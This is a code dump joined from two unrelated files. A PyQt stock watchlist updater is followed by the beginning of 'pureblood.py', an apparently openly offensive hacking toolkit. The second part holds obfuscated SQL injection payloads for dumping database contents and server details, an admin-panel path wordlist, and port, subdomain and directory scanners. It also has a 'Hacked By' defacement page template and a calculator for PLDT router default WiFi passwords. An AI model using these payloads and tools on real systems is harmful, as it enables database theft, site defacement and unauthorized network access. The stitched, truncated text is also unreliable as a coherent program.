elif self.data_ledger['Header']['active']['activeListtype'] == 'Watchlists':
columns = ['Stock', 'Price', '1d', '1w', '1m', '1y']
root_ui.tableWidget_listDisplay.setColumnCount(len(columns))
for i in range(len(columns)):
item = QtWidgets.QTableWidgetItem()
font = QtGui.QFont()
font.setFamily("Roboto")
font.setPointSize(12)
font.setBold(True)
font.setWeight(75)
item.setFont(font)
root_ui.tableWidget_listDisplay.setHorizontalHeaderItem(i, item)
root_ui.tableWidget_listDisplay.setHorizontalHeaderLabels(columns)
rowcount = 0
table_insert = []
last_stock = None
if self.data_ledger['Header']['active']['activeListtype'] is not None and self.data_ledger['Header']['active']['activeListname'] in self.data_ledger[self.data_ledger['Header']['active']['activeListtype']].keys():
if self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']] is not None:
for stock in self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']]:
for object in self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock].keys():
if 'Alert' in object: #TODO And Reference == Price, for other types
rowcount += 1
alert_info = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock][object]
price = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock]['Price']
condition = '{} {}'.format(alert_info['Operator'], alert_info['Threshold'])
table_insert.append([stock.replace('_', ' ') if stock != last_stock else '', condition, price, alert_info['Ratio']])
last_stock = stock
if object == 'Watch':
rowcount += 1
watch_info = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock][object]
price = self.data_ledger[self.data_ledger['Header']['active']['activeListtype']][self.data_ledger['Header']['active']['activeListname']][stock]['Price']
table_insert.append([stock.replace('_', ' '), price,
'{} ({}%)'.format(watch_info['price_1d'], watch_info['chg_1d']) if watch_info['chg_1d'] is not None else ' - - - ',
'{} ({}%)'.format(watch_info['price_1w'], watch_info['chg_1w']) if watch_info['chg_1w'] is not None else ' - - - ',
'{} ({}%)'.format(watch_info['price_1m'], watch_info['chg_1m']) if watch_info['chg_1m'] is not None else ' - - - ',
'{} ({}%)'.format(watch_info['price_1y'], watch_info['chg_1y']) if watch_info['chg_1y'] is not None else ' - - - '])
root_ui.tableWidget_listDisplay.setRowCount(rowcount)
for row in range(rowcount):
for column in range(root_ui.tableWidget_listDisplay.columnCount()):
root_ui.tableWidget_listDisplay.setItem(row, column, QtWidgets.QTableWidgetItem(str(table_insert[row][column])))
if self.data_ledger['Header']['active']['activeListtype'] == 'Alertlists':
if column in [0, 1]:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
elif column in [2, 3]:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
if row % 2 == 0:
root_ui.tableWidget_listDisplay.item(row, column).setBackground(QtGui.QColor(81, 81, 81))
font_size = 12
elif self.data_ledger['Header']['active']['activeListtype'] == 'Watchlists':
if column == 0:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignCenter | QtCore.Qt.AlignVCenter)
font_size = 12
elif column in [1, 2, 3, 4, 5]:
root_ui.tableWidget_listDisplay.item(row, column).setTextAlignment(QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter)
font_size = 10
if row % 2 == 0:
root_ui.tableWidget_listDisplay.item(row, column).setBackground(QtGui.QColor(81, 81, 81))
font = QtGui.QFont()
font.setFamily('Roboto')
font.setPointSize(font_size)
font.setWeight(75)
root_ui.tableWidget_listDisplay.item(row, column).setFont(font)
root_ui.tableWidget_listDisplay.item(row, column).setForeground(QtGui.QColor(234, 230, 228))
name_column_width = 250
                    rest_size = int((root_ui.tableWidget_listDisplay.frameGeometry().width() - name_column_width) / (len(columns) - 1))
for i in range(len(columns)):
if i == 0:
root_ui.tableWidget_listDisplay.horizontalHeader().resizeSection(i, name_column_width)
root_ui.tableWidget_listDisplay.horizontalHeader().setSectionResizeMode(i, QtWidgets.QHeaderView.Fixed)
else:
root_ui.tableWidget_listDisplay.horizontalHeader().resizeSection(i, rest_size)
root_ui.tableWidget_listDisplay.update()
else:
rowcount = 0
root_ui.tableWidget_listDisplay.setRowCount(rowcount)
root_ui.tableWidget_listDisplay.setGeometry(QtCore.QRect(190, 70, 820, 30 + (rowcount * 30)))
print('Updating Gui finished')
time.sleep(0.2)
#print('Ledger: ', self.data_ledger)
def update_data(self, update_timer):
time.sleep(10)
while True:
try:
print(self.data_ledger)
for typegroup in self.data_ledger.keys():
if typegroup != 'Header':
if self.data_ledger[typegroup] not in [None, '']:
for list_name in self.data_ledger[typegroup].keys():
if self.data_ledger[typegroup][list_name] is not None:
for stock_name in self.data_ledger[typegroup][list_name].keys():
# print('Typegroup: ', typegroup)
# print('Listname: ', list_name)
# print('Stockname: ', stock_name)
symbol = self.data_ledger[typegroup][list_name][stock_name]['Symbol']
for object in self.data_ledger[typegroup][list_name][stock_name].keys():
# TODO Add price update for other alerttypes and watchlist here
if 'Alert' in object:
if self.data_ledger[typegroup][list_name][stock_name][object]['Reference'] == 'Price':
stock_data = YahooFinancials(symbol)
self.data_ledger[typegroup][list_name][stock_name]['Price'] = stock_data.get_stock_price_data(reformat=True)[symbol]['regularMarketPrice']
self.data_ledger[typegroup][list_name][stock_name][object]['Ratio'] = \
'{}%'.format(round(float(self.data_ledger[typegroup][list_name][stock_name]['Price']) / float(self.data_ledger[typegroup][list_name][stock_name][object]['Threshold']) * 100, 2))
elif 'Watch' in object:
date_1d = dt.datetime.today().date() - dt.timedelta(days=1)
date_1w = dt.datetime.today().date() - dt.timedelta(days=5)
date_1m = dt.datetime.today().date() - dt.timedelta(days=30)
date_1y = dt.datetime.today().date() - dt.timedelta(days=360)
stock_data = YahooFinancials(symbol)
self.data_ledger[typegroup][list_name][stock_name]['Price'] = round(stock_data.get_stock_price_data(reformat=True)[symbol]['regularMarketPrice'], 2)
hpd = stock_data.get_historical_price_data('2020-01-01', dt.datetime.today().date().strftime('%Y-%m-%d'), 'daily')[symbol]['prices']
updated_1d = False
updated_1w = False
updated_1m = False
updated_1y = False
for day in reversed(hpd):
if day['formatted_date'] <= date_1d.strftime('%Y-%m-%d') and not updated_1d:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1d'] = round(day['close'], 2)
updated_1d = True
elif day['formatted_date'] <= date_1w.strftime('%Y-%m-%d') and not updated_1w:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1w'] = round(day['close'], 2)
updated_1w = True
elif day['formatted_date'] <= date_1m.strftime('%Y-%m-%d') and not updated_1m:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1m'] = round(day['close'], 2)
updated_1m = True
elif day['formatted_date'] <= date_1y.strftime('%Y-%m-%d') and not updated_1y:
self.data_ledger[typegroup][list_name][stock_name]['Watch']['price_1y'] = round(day['close'], 2)
updated_1y = True
for timeframe in [['price_1d', 'chg_1d'], ['price_1w', 'chg_1w'], ['price_1m', 'chg_1m'], ['price_1y', 'chg_1y']]:
if self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[0]] is not None:
self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[1]] = \
round((self.data_ledger[typegroup][list_name][stock_name]['Price'] / self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[0]] - 1) * 100, 2)
else:
self.data_ledger[typegroup][list_name][stock_name]['Watch'][timeframe[1]] = None
command_ledger.append({'forceGUIUpdate': None})
except RuntimeError:
continue
except KeyError:
break
self.update_sleep = True
while self.update_sleep:
for i in range(update_timer):
if self.update_sleep:
time.sleep(1)
self.update_sleep = False
|
pureblood.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Script Created By:
Cr4sHCoD3
Github:
https://github.com/cr4shcod3
FB Page:
https://facebook.com/cr4shcod3.py
Youtube:
https://www.youtube.com/channel/UCEw5DaWEUY0XeUOTl1U2LKw
Buy Me A Coffee:
https://www.buymeacoffee.com/f4a5kJcyl
Google Plus:
https://plus.google.com/u/0/115239095310355713855
Copyrights:
Cr4sHCoD3 2018
MIT LICENSE
Special Mentions:
PureHackers PH
Blood Security Hackers
"""
import os
import sys
import platform
import time
import datetime
import re
import threading
import socket
import webbrowser
import hashlib
import random
import subprocess
import zipfile
try:
import colorama
colorama.init()
except:
print ('[!] - Module (colorama) not installed!')
sys.exit()
try:
import requests
from requests.exceptions import ConnectionError
except:
print ('[!] - Module (requests) not installed!')
sys.exit()
try:
import whois
except:
print ('[!] - Module (python-whois) not installed!')
sys.exit()
try:
import dns.resolver
except:
print ('[!] - Module (dnspython) not installed!')
sys.exit()
try:
from bs4 import BeautifulSoup
except:
print ('[!] - Module (bs4) not installed!')
sys.exit()
try:
import shodan
except:
print ('[!] - Module (shodan) not installed!')
sys.exit()
#########################################################################################################################################################
# GLOBAL
FNULL = open(os.devnull, 'w')
google_hacking = 'https://www.google.com/search?q='
dios1 = '(/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(InFoRMAtiON_sCHeMa.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c7374726f6e672069643d2250757265426c6f6f64223e5461626c653a20,TaBLe_nAMe,0x203d3d20,column_name,0x3c2f7374726f6e673e3c62723e))))a)'
sqli_payload_hostname = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@hostname,0x3c2f7374726f6e673e)'
sqli_payload_tmpdir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@tmpdir,0x3c2f7374726f6e673e)'
sqli_payload_datadir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@datadir,0x3c2f7374726f6e673e)'
sqli_payload_version = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@version,0x3c2f7374726f6e673e)'
sqli_payload_basedir = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@basedir,0x3c2f7374726f6e673e)'
sqli_payload_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,user(),0x3c2f7374726f6e673e)'
sqli_payload_database = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,database(),0x3c2f7374726f6e673e)'
sqli_payload_schema = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,schema(),0x3c2f7374726f6e673e)'
sqli_payload_uuid = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,UUID(),0x3c2f7374726f6e673e)'
sqli_payload_system_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,system_user(),0x3c2f7374726f6e673e)'
sqli_payload_session_user = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,session_user(),0x3c2f7374726f6e673e)'
sqli_payload_symlink = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_symlink,0x3c2f7374726f6e673e)'
sqli_payload_ssl = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,@@GLOBAL.have_ssl,0x3c2f7374726f6e673e)'
sqli_dump_column_payload = 'CoNCat%0a(0x3c7374726f6e672069643d2250757265426c6f6f64494e464f223e,<column>,0x3c2f7374726f6e673e)'
## Color
reset = '\033[0m'
bold = '\033[1m'
underline = '\033[4m'
### Fore
black = '\033[90m'; red = '\033[91m'; green = '\033[92m'; yellow = '\033[93m'; blue = '\033[94m'; magenta = '\033[95m'; cyan = '\033[96m'; white = '\033[97m'
### Background
bg_black = '\033[90m'; bg_red = '\033[91m'; bg_green = '\033[92m'; bg_yellow = '\033[93m'; bg_blue = '\033[94m'; bg_magenta = '\033[95m'; bg_cyan = '\033[96m'; bg_white = '\033[97m'
## Configuration
if platform.system() == 'Windows':
from ctypes import windll, create_string_buffer
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
import struct
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom, maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
else:
sizex, sizey = 80, 25
elif platform.system() == 'Linux' or platform.system() == 'Darwin':
sizey, sizex = os.popen('stty size', 'r').read().split()
else:
sizex = 50
## Date Time
month = datetime.date.today().strftime("%B")
weekday_names = {'0': 'Sunday', '1': 'Monday', '2': 'Tuesday', '3': 'Wednesday',
                 '4': 'Thursday', '5': 'Friday', '6': 'Saturday'}
day = weekday_names[datetime.date.today().strftime("%w")]
mday = datetime.date.today().strftime("%d")
year = datetime.date.today().strftime("%Y")
current_datetime = datetime.datetime.now()
current_time = current_datetime.strftime('%I:%M:%S')
## List
ids = [
'NONE','A','NS','MD','MF','CNAME','SOA','MB','MG','MR','NULL','WKS','PTR','HINFO','MINFO','MX','TXT','RP','AFSDB','X25','ISDN','RT','NSAP','NSAP-PTR','SIG','KEY','PX','GPOS','AAAA','LOC','NXT','SRV','NAPTR','KX','CERT','A6','DNAME','OPT','APL','DS','SSHFP','IPSECKEY','RRSIG','NSEC','DNSKEY','DHCID','NSEC3','NSEC3PARAM','TLSA','HIP','CDS','CDNSKEY','CSYNC','SPF','UNSPEC','EUI48','EUI64','TKEY','TSIG','IXFR','AXFR','MAILB','MAILA','ANY','URI','CAA','TA','DLV'
]
admin_panel_list = ['/admin.aspx','/admin.asp','/admin.php','/admin/','/administrator/','/moderator/','/webadmin/','/adminarea/','/bb-admin/','/adminLogin/','/admin_area/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm/','/admin/account.php','/admin/index.php','/admin/login.php','/admin/admin.php','/admin/account.php','/joomla/administrator','/login.php','/admin_area/admin.php','/admin_area/login.php','/siteadmin/login.php','/siteadmin/index.php','/siteadmin/login.html','/admin/account.html','/admin/index.html','/admin/login.html','/admin/admin.html','/admin_area/index.php','/bb-admin/index.php','/bb-admin/login.php','/bb-admin/admin.php','/admin/home.php','/admin_area/login.html','/admin_area/index.html','/admin/controlpanel.php','/admincp/index.asp','/admincp/login.asp','/admincp/index.html','/admin/account.html','/adminpanel.html','/webadmin.html','webadmin/index.html','/webadmin/admin.html','/webadmin/login.html','/admin/admin_login.html','/admin_login.html','/panel-administracion/login.html','/admin/cp.php','cp.php','/administrator/index.php','/administrator/login.php','/nsw/admin/login.php','/webadmin/login.php','/admin/admin_login.php','/admin_login.php','/administrator/account.php','/administrator.php','/admin_area/admin.html','/pages/admin/admin-login.php','/admin/admin-login.php','/admin-login.php','/bb-admin/index.html','/bb-admin/login.html','/bb-admin/admin.html','/admin/home.html','/modelsearch/login.php','/moderator.php','/moderator/login.php','/moderator/admin.php','/account.php','/pages/admin/admin-login.html','/admin/admin-login.html','/admin-login.html','/controlpanel.php','/admincontrol.php','/admin/adminLogin.html','/adminLogin.html','/admin/adminLogin.html','/home.html','/rcjakar/admin/login.php','/adminarea/index.html','/adminarea/admin.html','/webadmin.php','/webadmin/index.php','/webadmin/admin.php','/admin/controlpanel.html','/admin.html','/admin/cp.html','cp.html','/adminpanel.php','/moderator.html','/administrator/index.html','/administrator/login.html','/user.html','/administrator/account.html','/administrator.html','/login.html','/modelsearch/login.html','/moderator/login.html','/adminarea/login.html','/panel-administracion/index.html','/panel-administracion/admin.html','/modelsearch/index.html','/modelsearch/admin.html','/admincontrol/login.html','/adm/index.html','/adm.html','/moderator/admin.html','/user.php','/account.html','/controlpanel.html','/admincontrol.html','/panel-administracion/login.php','/wp-login.php','/adminLogin.php','/admin/adminLogin.php','/home.php','/adminarea/index.php','/adminarea/admin.php','/adminarea/login.php','/panel-administracion/index.php','/panel-administracion/admin.php','/modelsearch/index.php','/modelsearch/admin.php','/admincontrol/login.php','/adm/admloginuser.php','/admloginuser.php','/admin2.php','/admin2/login.php','/admin2/index.php','adm/index.php','adm.php','affiliate.php','/adm_auth.php ','/memberadmin.php','/administratorlogin.php','/login/admin.asp','/admin/login.asp','/administratorlogin.asp','/login/asmindstrator.asp','/admin/login.aspx','/login/admin.aspx','/administartorlogin.aspx','login/administrator.aspx','/adminlogin.asp','a/dminlogin.aspx','/admin_login.asp','/admin_login.aspx','/adminhome.asp','/adminhome.aspx''/administrator_login.asp','/administrator_login.aspx']
admin_panel_valid = []
dbms_errors = {
'MySQL': (r'SQL syntax.*MySQL', r'Warning.*mysql_.*', r'MySQL Query fail.*', r'SQL syntax.*MariaDB server'),
'PostgreSQL': (r'PostgreSQL.*ERROR', r'Warning.*\Wpg_.*', r'Warning.*PostgreSQL'),
'Microsoft SQL Server': (r'OLE DB.* SQL Server', r'(\W|\A)SQL Server.*Driver', r'Warning.*odbc_.*', r'Warning.*mssql_', r'Msg \d+, Level \d+, State \d+', r'Unclosed quotation mark after the character string', r'Microsoft OLE DB Provider for ODBC Drivers'),
'Microsoft Access': (r'Microsoft Access Driver', r'Access Database Engine', r'Microsoft JET Database Engine', r'.*Syntax error.*query expression'),
'Oracle': (r'\bORA-[0-9][0-9][0-9][0-9]', r'Oracle error', r'Warning.*oci_.*', 'Microsoft OLE DB Provider for Oracle'),
'IBM DB2': (r'CLI Driver.*DB2', r'DB2 SQL error'),
'SQLite': (r'SQLite/JDBCDriver', r'System.Data.SQLite.SQLiteException'),
'Informix': (r'Warning.*ibase_.*', r'com.informix.jdbc'),
'Sybase': (r'Warning.*sybase.*', r'Sybase message')
}
## Threading Object Funtions
def TCP_connect(ip, port_number, delay, output):
TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
TCPsock.settimeout(delay)
try:
TCPsock.connect((ip, port_number))
output[port_number] = 'Open'
except:
output[port_number] = ''
def dns_record_scanner(drs_hostname, ids_item, dns_record_list):
try:
answers = dns.resolver.query(drs_hostname, ids_item)
for rdata in answers:
ids_item = str(ids_item); rdata = str(rdata)
dns_record_list.append(str(ids_item + ' : ' + rdata))
except Exception:
pass
def subdomain_scanner(subdomain, so_200, so_301, so_302, so_403):
subdomain = 'http://' + subdomain
try:
subdomain_scanner_request = requests.get(subdomain)
subdomain_scanner_code = subdomain_scanner_request.status_code
if subdomain_scanner_code == 200:
so_200.append(subdomain)
elif subdomain_scanner_code == 301:
so_301.append(subdomain)
elif subdomain_scanner_code == 302:
so_302.append(subdomain)
elif subdomain_scanner_code == 403:
so_403.append(subdomain)
except ConnectionError:
pass
def directory_scanner(ds_url_list, directory_fuzz_final1, directory_fuzz_final2, directory_fuzz_final3):
try:
directory_fuzz_request = requests.get(ds_url_list)
if directory_fuzz_request.status_code == 200:
directory_fuzz_final1.append(ds_url_list)
elif directory_fuzz_request.status_code == 301 or directory_fuzz_request.status_code == 302:
directory_fuzz_final2.append(ds_url_list)
elif directory_fuzz_request.status_code == 403:
directory_fuzz_final3.append(ds_url_list)
except:
pass
def file_scanner(fs_url_list, file_fuzz_final1, file_fuzz_final2, file_fuzz_final3):
try:
file_fuzz_request = requests.get(fs_url_list)
if file_fuzz_request.status_code == 200:
file_fuzz_final1.append(fs_url_list)
elif file_fuzz_request.status_code == 301 or file_fuzz_request.status_code == 302:
file_fuzz_final2.append(fs_url_list)
elif file_fuzz_request.status_code == 403:
file_fuzz_final3.append(fs_url_list)
except:
pass
# END GLOBAL
#########################################################################################################################################################
class Generator:
def deface_page(self, title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups):
deface_page_template = '''
<html>
<head>
<title>--=[ Hacked By {0} ]=--</title>
<meta charset=\"UTF-8\">
<link rel=\"SHORTCUT ICON\" href=\"{1}\">
<meta name=\"Author\" content=\"Cr4sHCoD3 | PureHackers x Blood Security Hackers\"/>
<meta name=\"copyright\" content=\"PureHackers | Blood Security Hackers\"/>
<meta name=\"description\" content=\"{2}.\"/> <!-- Change this -->
<meta name=\"keywords\" content=\"Hacked, Pawned, Defaced, Security, PureHackers, Blood Security Hackers, PureBlood, Cr4sHCoD3\"/> <!-- Change this -->
<meta property=\"og:title\" content=\"Hacked By {0}\"/>
<meta property=\"og:image\" content=\"{3}\"> <!-- Change this -->
<style>
{9} url(\"https://cr4shcod3.github.io/python/pureblood/pureblood.css\");
</style>
</head>
<body>
<div class=\"bg\">
<center>
<img src=\"{4}\" class=\"logo\"/> <!-- Change This -->
<h1 class=\"header glitch\" data-text=\"Hacked By {5}\">Hacked By {5}</h1><br><br>
<p class=\"message\">{6}</p>
<p class=\"message\">{7}</p><br><br>
<p class=\"groups\">Greetings: {8}</p>
</center>
</div>
</body>
</html>
'''.format(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups, '@import')
self.deface_page_result = deface_page_template
return self.deface_page_result
def password_generator(self, length, text):
password_generator_final1 = ''
password_generator_final2 = ''
password_generator_final3 = ''
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-_=+[{}];:\'"\|,<.>/?`~'
for i in range(length):
char_random = random.choice(chars)
password_generator_final1 += char_random
password_generator_final2 = hashlib.md5(text.encode('utf-8')).hexdigest()
l33t_alphabet = ['4','8','(','|)','3','|=','9','#','1','_|','|<','|_','|\/|','|\|','0','|D','(,)','|2','$','7','|_|','\/','\/\/','><','\'/','(/)']
for i in text:
if i == 'a' or i == 'A':
text = text.replace('a', l33t_alphabet[0]).replace('A', l33t_alphabet[0])
elif i == 'b' or i == 'B':
text = text.replace('b', l33t_alphabet[1]).replace('B', l33t_alphabet[1])
elif i == 'c' or i == 'C':
text = text.replace('c', l33t_alphabet[2]).replace('C', l33t_alphabet[2])
elif i == 'd' or i == 'D':
text = text.replace('d', l33t_alphabet[3]).replace('D', l33t_alphabet[3])
elif i == 'e' or i == 'E':
text = text.replace('e', l33t_alphabet[4]).replace('E', l33t_alphabet[4])
elif i == 'f' or i == 'F':
text = text.replace('f', l33t_alphabet[5]).replace('F', l33t_alphabet[5])
elif i == 'g' or i == 'G':
text = text.replace('g', l33t_alphabet[6]).replace('G', l33t_alphabet[6])
elif i == 'h' or i == 'H':
text = text.replace('h', l33t_alphabet[7]).replace('H', l33t_alphabet[7])
elif i == 'i' or i == 'I':
text = text.replace('i', l33t_alphabet[8]).replace('I', l33t_alphabet[8])
elif i == 'j' or i == 'J':
text = text.replace('j', l33t_alphabet[9]).replace('J', l33t_alphabet[9])
elif i == 'k' or i == 'K':
text = text.replace('k', l33t_alphabet[10]).replace('K', l33t_alphabet[10])
elif i == 'l' or i == 'L':
text = text.replace('l', l33t_alphabet[11]).replace('L', l33t_alphabet[11])
elif i == 'm' or i == 'M':
text = text.replace('m', l33t_alphabet[12]).replace('M', l33t_alphabet[12])
elif i == 'n' or i == 'N':
text = text.replace('n', l33t_alphabet[13]).replace('N', l33t_alphabet[13])
elif i == 'o' or i == 'O':
text = text.replace('o', l33t_alphabet[14]).replace('O', l33t_alphabet[14])
elif i == 'p' or i == 'P':
text = text.replace('p', l33t_alphabet[15]).replace('P', l33t_alphabet[15])
elif i == 'q' or i == 'Q':
text = text.replace('q', l33t_alphabet[16]).replace('Q', l33t_alphabet[16])
elif i == 'r' or i == 'R':
text = text.replace('r', l33t_alphabet[17]).replace('R', l33t_alphabet[17])
elif i == 's' or i == 'S':
text = text.replace('s', l33t_alphabet[18]).replace('S', l33t_alphabet[18])
elif i == 't' or i == 'T':
text = text.replace('t', l33t_alphabet[19]).replace('T', l33t_alphabet[19])
elif i == 'u' or i == 'U':
text = text.replace('u', l33t_alphabet[20]).replace('U', l33t_alphabet[20])
elif i == 'v' or i == 'V':
text = text.replace('v', l33t_alphabet[21]).replace('V', l33t_alphabet[21])
elif i == 'w' or i == 'W':
text = text.replace('w', l33t_alphabet[22]).replace('W', l33t_alphabet[22])
elif i == 'x' or i == 'X':
text = text.replace('x', l33t_alphabet[23]).replace('X', l33t_alphabet[23])
elif i == 'y' or i == 'Y':
text = text.replace('y', l33t_alphabet[24]).replace('Y', l33t_alphabet[24])
elif i == 'z' or i == 'Z':
text = text.replace('z', l33t_alphabet[25]).replace('Z', l33t_alphabet[25])
password_generator_final3 = text
self.password_generator_result1 = password_generator_final1
self.password_generator_result2 = password_generator_final2
self.password_generator_result3 = password_generator_final3
return self.password_generator_result1, self.password_generator_result2, self.password_generator_result3
def pldt_password_calculator(self, digit5, mac5):
pldt_password_calculator_final1 = ['PLDTWIFI' + digit5, 'pldtwifi'+ digit5]
pldt_password_calculator_final2_multiply = digit5 * 3
pldt_password_calculator_final2 = ['PLDTWIFI' + pldt_password_calculator_final2_multiply, 'pldtwifi' + pldt_password_calculator_final2_multiply]
        # Swap each hex digit with its complement (0<->f, 1<->e, ..., 7<->8);
        # characters outside 0-9a-f pass through unchanged.
        nibble_swap = {'0': 'f', '1': 'e', '2': 'd', '3': 'c', '4': 'b', '5': 'a', '6': '9', '7': '8',
                       '8': '7', '9': '6', 'a': '5', 'b': '4', 'c': '3', 'd': '2', 'e': '1', 'f': '0'}
        digit55 = ''.join(nibble_swap.get(ch, ch) for ch in digit5)
pldt_password_calculator_final3 = 'wlan' + digit55
pldt_password_calculator_final4 = ['PLDTWIFI' + digit55, 'pldtwifi' + digit55]
pldt_password_calculator_final5 = 'HomeBro_' + mac5
self.pldt_password_calculator_result1 = pldt_password_calculator_final1
self.pldt_password_calculator_result2 = pldt_password_calculator_final2
self.pldt_password_calculator_result3 = pldt_password_calculator_final3
self.pldt_password_calculator_result4 = pldt_password_calculator_final4
self.pldt_password_calculator_result5 = pldt_password_calculator_final5
return self.pldt_password_calculator_result1, self.pldt_password_calculator_result2, self.pldt_password_calculator_result3, self.pldt_password_calculator_result4, self.pldt_password_calculator_result5
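    # Usage sketch (hypothetical inputs): Generator().pldt_password_calculator('1a2b3', '1CC1DE')
    # returns candidate default passwords derived from the SSID's last five hex digits
    # plus the 'HomeBro_' + MAC-fragment pattern.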
def text_to_hash(self, text):
md5_final = hashlib.md5(text.encode('utf-8')).hexdigest()
sha1_final = hashlib.sha1(text.encode('utf-8')).hexdigest()
sha224_final = hashlib.sha224(text.encode('utf-8')).hexdigest()
sha256_final = hashlib.sha256(text.encode('utf-8')).hexdigest()
sha384_final = hashlib.sha384(text.encode('utf-8')).hexdigest()
sha512_final = hashlib.sha512(text.encode('utf-8')).hexdigest()
md4 = hashlib.new('md4')
md4.update(text.encode('utf-8'))
md4_final = md4.hexdigest()
ripemd160 = hashlib.new('ripemd160')
ripemd160.update(text.encode('utf-8'))
ripemd160_final = ripemd160.hexdigest()
whirlpool = hashlib.new('whirlpool')
whirlpool.update(text.encode('utf-8'))
whirlpool_final = whirlpool.hexdigest()
text_to_hash_final = """
Text To Hash Result:
[+] MD4: {0}
[+] MD5: {1}
[+] SHA1: {2}
[+] SHA224: {3}
[+] SHA256: {4}
[+] SHA384: {5}
[+] SHA512: {6}
[+] RipeMD160: {7}
[+] Whirlpool: {8}
""".format(md4_final, md5_final, sha1_final, sha224_final, sha256_final, sha384_final, sha512_final, ripemd160_final, whirlpool_final)
self.text_to_hash_result = text_to_hash_final
return self.text_to_hash_result
class WebApplicationAttack:
def wp_scan(self, url):
wp_scan_test_ruby_command = subprocess.call('ruby --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
elif wp_scan_test_ruby_command == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
